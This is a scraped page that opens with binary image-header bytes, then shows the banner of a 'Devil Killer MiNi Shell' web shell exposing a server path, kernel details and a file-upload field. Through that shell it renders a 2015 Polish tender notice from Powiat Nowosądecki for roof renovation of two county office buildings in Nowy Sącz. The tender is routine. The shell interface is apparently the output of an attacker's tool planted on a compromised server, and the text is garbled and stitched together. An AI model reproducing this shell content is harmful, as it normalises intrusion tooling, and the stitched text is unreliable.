JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150325/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150325/41917-N-2015.html

<p class="kh_header"><b>Nowy Sącz: ZP.272.6.2015 zamówienie na modernizację i renowację dachu budynku Starostwa Powiatowego w Nowym Sączu przy  ul. Strzeleckiej 1 wraz z robotami towarzyszącymi  oraz modernizację i renowację dachu budynku Starostwa Powiatowego w Nowym Sączu przy ul. Jagiellońskiej 33 wraz z robotami towarzyszącymi</b><br>
<b>Numer ogłoszenia: 41917 - 2015; data zamieszczenia: 25.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Nowosądecki, Zarząd Powiatu Nowosądeckiego , ul. Jagiellońska 33, 33-300 Nowy Sącz, woj. małopolskie, tel. 18 4141600, faks 18 4141700.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nowosadecki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZP.272.6.2015 zamówienie na modernizację i renowację dachu budynku Starostwa Powiatowego w Nowym Sączu przy  ul. Strzeleckiej 1 wraz z robotami towarzyszącymi  oraz modernizację i renowację dachu budynku Starostwa Powiatowego w Nowym Sączu przy ul. Jagiellońskiej 33 wraz z robotami towarzyszącymi.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane: modernizacja i renowacja dachu budynku Starostwa Powiatowego w Nowym Sączu przy ul. Strzeleckiej 1 wraz z robotami towarzyszącymi  oraz modernizacja i renowacja dachu budynku Starostwa Powiatowego w Nowym Sączu przy ul. Jagiellońskiej 33 wraz  z robotami towarzyszącymi.
Postępowanie zostało podzielone na dwie wyszczególnione poniżej części. Wykonawca może złożyć ofertę na obydwie części lub część  przez siebie wybraną.

CZĘŚĆ I ZAMÓWIENIA
Modernizacja i renowacja dachu budynku Starostwa Powiatowego w Nowym Sączu               przy ul. Strzeleckiej 1 wraz z robotami towarzyszącymi w tym:
1.	rozebranie pokryć dachowych z blachy nadającej się do użytku - obróbki kominów
2.	czyszczenie przez szczotkowanie ręczne blachy pokrycia dachu
3.	naprawa rynien bez zdejmowania polegająca na sprawdzeniu i polutowaniu pęknięć
4.	sprawdzenie, wyprostowanie, polutowanie uszkodzeń, umocowanie obruszonych rynien
5.	wykonanie ocieplenia połaci dachu wraz z pokryciem membraną epdm w zakresie: paroizolacja, ocieplenie styropianem dachowym lub PIR, pokrycie membraną, attyk            i kominków, demontaż wyłazu dachowego
6.	rozebranie warstwy izolacyjnej z wełny mineralnej gr. do 20 cm
7.	wykonanie rynien do gazu
8.	wywiezienie wełny mineralnej z terenu rozbiórki przy ręcznym załadowaniu                            i mechanicznym wyładowaniu - transport samochodem samowyładowczym                       na odległość do 1 km
9.	rozbiórka elementów sufitów podwieszanych
10.	okładziny gipsowo-kartonowe na stropach, na ruszcie metalowym podwójnym podwieszonym
11.	tynki 1-warstwowe wewnętrzne z gipsu szpachlowego wykonywane ręcznie stropów
12.	dwukrotne malowanie farbami emulsyjnymi podłoży gipsowych z gruntowaniem
13.	drabina na dach z kabłąkiem mocowana do ściany zewnętrznej.
Termin realizacji zamówienia od dnia podpisania umowy do dnia 27 czerwca 2015 r.
W związku z tym, że środki finansowe na realizacje inwestycji są wydatkami niewygasającymi z 2014 r. muszą być wydatkowanie do 30 czerwca 2015 r. dlatego też termin realizacji przedmiotu umowy nie może przekroczyć wskazanego terminu tj. 27 czerwca 2015 r.


CZĘŚĆ II ZAMÓWIENIA

Modernizacja i renowacja dachu budynku Starostwa Powiatowego w Nowym Sączu przy ul. Jagiellońskiej 33, wraz z  robotami towarzyszącymi w tym:
1.	demontaż gąsiorów z blachy
2.	czyszczenie przez szczotkowanie ręczne blachy pokrycia dachu
3.	montaż gąsiorów wraz z uszczelkami klinowymi
4.	naprawa rynien bez zdejmowania polegająca na sprawdzeniu i polutowaniu pęknięć
5.	wymiana zniszczonych śrub mocujących blachę
6.	odtłuszczanie blachy pokrycia dachu
7.	gruntowanie podłoży stalowych
8.	malowanie pędzlem blachy pokrycia dachu - farby do gruntowania
9.	malowanie pędzlem blachy pokrycia dachu - farba nawierzchniowa
10.	szpachlowanie zagruntowanych podłoży - analogia: usunięcie istniejących uszczelnień oraz ponowne uszczelnienie 
11.	obróbki blacharskie z blachy powlekanej - czapki kominów
12.	obróbki kominów - montaż taśm termokurczliwych
13.	montaż deflektorów poprawiających ciąg na wylotach przewodów wentylacyjnych kominów
14.	czyszczenie przez szczotkowanie ręczne od stanu B do 3-go stopnia czystości konstrukcji pełnościennych
15.	malowanie pędzlem blachy pokrycia dachu - farba nawierzchniowa
16.	analogia - wymiana podestów ław kominiarskich i podestów z desek
17.	montaż stopni wyłazowych oraz barierki zabezpieczającej wejścia na strych z poziomu piętra
18.	rury wywiewne z blachy stalowej ocieplone - wyprowadzenie odpowietrzników                      z przestrzeni strychowej ponad dach, wykonanie obróbki
Termin realizacji zamówienia od dnia podpisania umowy do dnia 27 czerwca 2015 r. 
W związku z tym, że środki finansowe na realizację inwestycji są wydatkami niewygasającymi z 2014 r. muszą być wydatkowane do 30 czerwca 2015 r. dlatego też  termin realizacji przedmiotu umowy nie może przekroczyć wskazanego terminu tj. 27 czerwca 2015 r. 
Informacje dotyczące obu części zamówienia:

UWAGA:
a)	W przedmiarze robót i specyfikacji technicznej wykonania i odbioru robót budowlanych  we wszystkich pozycjach, w których występuje nazwa producenta Zamawiający dopuszcza możliwość wykorzystania produktów równoważnych tzn. o nie gorszych parametrach technicznych niż te, które posiadają wskazane za pomocą znaku towarowego czy pochodzenia produkty.
b)	W przypadkach, w których przedmiot zamówienia opisany jest za pomocą norm, aprobat, specyfikacji technicznych i systemów odniesienia, o których mowa w art. 30 ust. 1-3 ustawy, Zamawiający wskazuje, że dopuszcza rozwiązania równoważne opisywanym. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego, jest obowiązany wykazać, że oferowane przez niego dostawy, usługi lub roboty budowlane spełniają wymagania określone przez Zamawiającego.
c)	Zamawiający wymaga, by na przedmiotowe roboty wykonawca udzielił minimum pięcioletniej gwarancji.
d)	Budynki starostwa w całym okresie realizacji niniejszego zamówienia będą użytkowane. Wykonawca musi w taki sposób zorganizować roboty budowlane, aby możliwe było niezakłócone użytkowanie obiektów. Wykonawca w trakcie realizacji robót budowlanych musi zapewnić również bezpieczeństwo osobom przebywającym w budynku.
e)	Niniejsza specyfikacja opisuje przedmiot zamówienia w sposób kompletny. Jednakże w celu lepszego zapoznania się z przedmiotem zamówienia Zamawiający umożliwia dokonanie przez Wykonawcę (na własny koszt) oględzin miejsc, w których nastąpi realizacja przedmiotu zamówienia i jego otoczenia i zaleca szczegółowe zapoznanie się z dokumentacją.
f)	Przed przystąpieniem do realizacji zamówienia Wykonawca zobowiązany jest uzgodnić z Zamawiającym harmonogram prac remontowych.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.26.19.10-6, 45.45.30.00-7, 45.26.26.90-4, 45.40.00.00-1, 45.44.21.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 27.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Z uwagi na wartość przedmiotu zamówienia Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia w trybie art. 22 ust. 1 ustawy Prawo zamówień publicznych (oświadczenie to stanowi załącznik nr 3 do specyfikacji). Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia - nie spełnia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia w trybie art. 22 ust. 1 ustawy Prawo zamówień publicznych (oświadczenie to stanowi załącznik nr 3 do specyfikacji). Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia - nie spełnia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia w trybie art. 22 ust. 1 ustawy Prawo zamówień publicznych (oświadczenie to stanowi załącznik nr 3 do specyfikacji). Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia - nie spełnia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia w trybie art. 22 ust. 1 ustawy Prawo zamówień publicznych (oświadczenie to stanowi załącznik nr 3 do specyfikacji). Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia - nie spełnia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia w trybie art. 22 ust. 1 ustawy Prawo zamówień publicznych (oświadczenie to stanowi załącznik nr 3 do specyfikacji). Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia - nie spełnia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty powinien być dołączony dokument określający zasady reprezentacji oraz osoby uprawnione do
reprezentacji Wykonawcy, a jeżeli Wykonawcę reprezentuje pełnomocnik - także pełnomocnictwo,
określające zakres umocowania, podpisane przez osoby uprawnione do reprezentowania Wykonawcy.
Pełnomocnictwo do podpisania oferty winno być dołączone do oferty (oryginał lub kopia potwierdzona za
zgodność z oryginałem przez notariusza), o ile prawo do podpisania oferty nie wynika z innych
dokumentów dołączonych do oferty. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale
technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych
innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków. Wykonawca w
takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami w trakcie
realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów
do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Gwarancja na wykonane roboty budowlane - 5</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat.nowy-sacz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Nowym Sączu, Zespół ds. Zamówień Publicznych, pok. 320 ul. Jagiellońska 33, 33-300 Nowy Sącz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.04.2015 godzina 10:00, miejsce: Starostwo Powiatowe w Nowym Sączu Kancelaria Administracyjna, pok. 113, ul.
Jagiellońska 33, 33-300 Nowy Sącz.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający przewiduje możliwość wykluczenia z postępowania o udzielenie zamówienia
Wykonawcy, który w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie
naruszył obowiązki zawodowe, w szczególności, gdy Wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co Zamawiający jest w stanie
wykazać za pomocą dowolnych środków dowodowych. Zamawiający nie wykluczy z postępowania o
udzielenie zamówienia Wykonawcy, który udowodni, że podjął konkretne środki techniczne, organizacyjne i
kadrowe, które mają zapobiec zawinionemu i poważnemu naruszaniu obowiązków zawodowych w
przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał
się do ich naprawienia.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> CZĘŚĆ I ZAMÓWIENIA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ I ZAMÓWIENIA
Modernizacja i renowacja dachu budynku Starostwa Powiatowego w Nowym Sączu               przy ul. Strzeleckiej 1 wraz z robotami towarzyszącymi w tym:
1.	rozebranie pokryć dachowych z blachy nadającej się do użytku - obróbki kominów
2.	czyszczenie przez szczotkowanie ręczne blachy pokrycia dachu
3.	naprawa rynien bez zdejmowania polegająca na sprawdzeniu i polutowaniu pęknięć
4.	sprawdzenie, wyprostowanie, polutowanie uszkodzeń, umocowanie obruszonych rynien
5.	wykonanie ocieplenia połaci dachu wraz z pokryciem membraną epdm w zakresie: paroizolacja, ocieplenie styropianem dachowym lub PIR, pokrycie membraną, attyk            i kominków, demontaż wyłazu dachowego
6.	rozebranie warstwy izolacyjnej z wełny mineralnej gr. do 20 cm
7.	wykonanie rynien do gazu
8.	wywiezienie wełny mineralnej z terenu rozbiórki przy ręcznym załadowaniu                            i mechanicznym wyładowaniu - transport samochodem samowyładowczym                       na odległość do 1 km
9.	rozbiórka elementów sufitów podwieszanych
10.	okładziny gipsowo-kartonowe na stropach, na ruszcie metalowym podwójnym podwieszonym
11.	tynki 1-warstwowe wewnętrzne z gipsu szpachlowego wykonywane ręcznie stropów
12.	dwukrotne malowanie farbami emulsyjnymi podłoży gipsowych z gruntowaniem
13.	drabina na dach z kabłąkiem mocowana do ściany zewnętrznej.
Termin realizacji zamówienia od dnia podpisania umowy do dnia 27 czerwca 2015 r.
W związku z tym, że środki finansowe na realizacje inwestycji są wydatkami niewygasającymi z 2014 r. muszą być wydatkowanie do 30 czerwca 2015 r. dlatego też termin realizacji przedmiotu umowy nie może przekroczyć wskazanego terminu tj. 27 czerwca 2015 r.
Informacje dotyczące obu części zamówienia:

UWAGA:
a)	W przedmiarze robót i specyfikacji technicznej wykonania i odbioru robót budowlanych  we wszystkich pozycjach, w których występuje nazwa producenta Zamawiający dopuszcza możliwość wykorzystania produktów równoważnych tzn. o nie gorszych parametrach technicznych niż te, które posiadają wskazane za pomocą znaku towarowego czy pochodzenia produkty.
b)	W przypadkach, w których przedmiot zamówienia opisany jest za pomocą norm, aprobat, specyfikacji technicznych i systemów odniesienia, o których mowa w art. 30 ust. 1-3 ustawy, Zamawiający wskazuje, że dopuszcza rozwiązania równoważne opisywanym. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego, jest obowiązany wykazać, że oferowane przez niego dostawy, usługi lub roboty budowlane spełniają wymagania określone przez Zamawiającego.
c)	Zamawiający wymaga, by na przedmiotowe roboty wykonawca udzielił minimum pięcioletniej gwarancji.
d)	Budynki starostwa w całym okresie realizacji niniejszego zamówienia będą użytkowane. Wykonawca musi w taki sposób zorganizować roboty budowlane, aby możliwe było niezakłócone użytkowanie obiektów. Wykonawca w trakcie realizacji robót budowlanych musi zapewnić również bezpieczeństwo osobom przebywającym w budynku.
e)	Niniejsza specyfikacja opisuje przedmiot zamówienia w sposób kompletny. Jednakże w celu lepszego zapoznania się z przedmiotem zamówienia Zamawiający umożliwia dokonanie przez Wykonawcę (na własny koszt) oględzin miejsc, w których nastąpi realizacja przedmiotu zamówienia i jego otoczenia i zaleca szczegółowe zapoznanie się z dokumentacją.
f)	Przed przystąpieniem do realizacji zamówienia Wykonawca zobowiązany jest uzgodnić z Zamawiającym harmonogram prac remontowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.26.19.10-6, 45.45.30.00-7, 45.26.26.90-4, 45.40.00.00-1, 45.44.21.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Gwarancja na wykonane roboty budowlane - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> CZĘŚĆ II ZAMÓWIENIA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ II ZAMÓWIENIA

Modernizacja i renowacja dachu budynku Starostwa Powiatowego w Nowym Sączu przy ul. Jagiellońskiej 33, wraz z  robotami towarzyszącymi w tym:
1.	demontaż gąsiorów z blachy
2.	czyszczenie przez szczotkowanie ręczne blachy pokrycia dachu
3.	montaż gąsiorów wraz z uszczelkami klinowymi
4.	naprawa rynien bez zdejmowania polegająca na sprawdzeniu i polutowaniu pęknięć
5.	wymiana zniszczonych śrub mocujących blachę
6.	odtłuszczanie blachy pokrycia dachu
7.	gruntowanie podłoży stalowych
8.	malowanie pędzlem blachy pokrycia dachu - farby do gruntowania
9.	malowanie pędzlem blachy pokrycia dachu - farba nawierzchniowa
10.	szpachlowanie zagruntowanych podłoży - analogia: usunięcie istniejących uszczelnień oraz ponowne uszczelnienie 
11.	obróbki blacharskie z blachy powlekanej - czapki kominów
12.	obróbki kominów - montaż taśm termokurczliwych
13.	montaż deflektorów poprawiających ciąg na wylotach przewodów wentylacyjnych kominów
14.	czyszczenie przez szczotkowanie ręczne od stanu B do 3-go stopnia czystości konstrukcji pełnościennych
15.	malowanie pędzlem blachy pokrycia dachu - farba nawierzchniowa
16.	analogia - wymiana podestów ław kominiarskich i podestów z desek
17.	montaż stopni wyłazowych oraz barierki zabezpieczającej wejścia na strych z poziomu piętra
18.	rury wywiewne z blachy stalowej ocieplone - wyprowadzenie odpowietrzników                      z przestrzeni strychowej ponad dach, wykonanie obróbki
Termin realizacji zamówienia od dnia podpisania umowy do dnia 27 czerwca 2015 r. 
W związku z tym, że środki finansowe na realizację inwestycji są wydatkami niewygasającymi z 2014 r. muszą być wydatkowane do 30 czerwca 2015 r. dlatego też  termin realizacji przedmiotu umowy nie może przekroczyć wskazanego terminu tj. 27 czerwca 2015 r. 
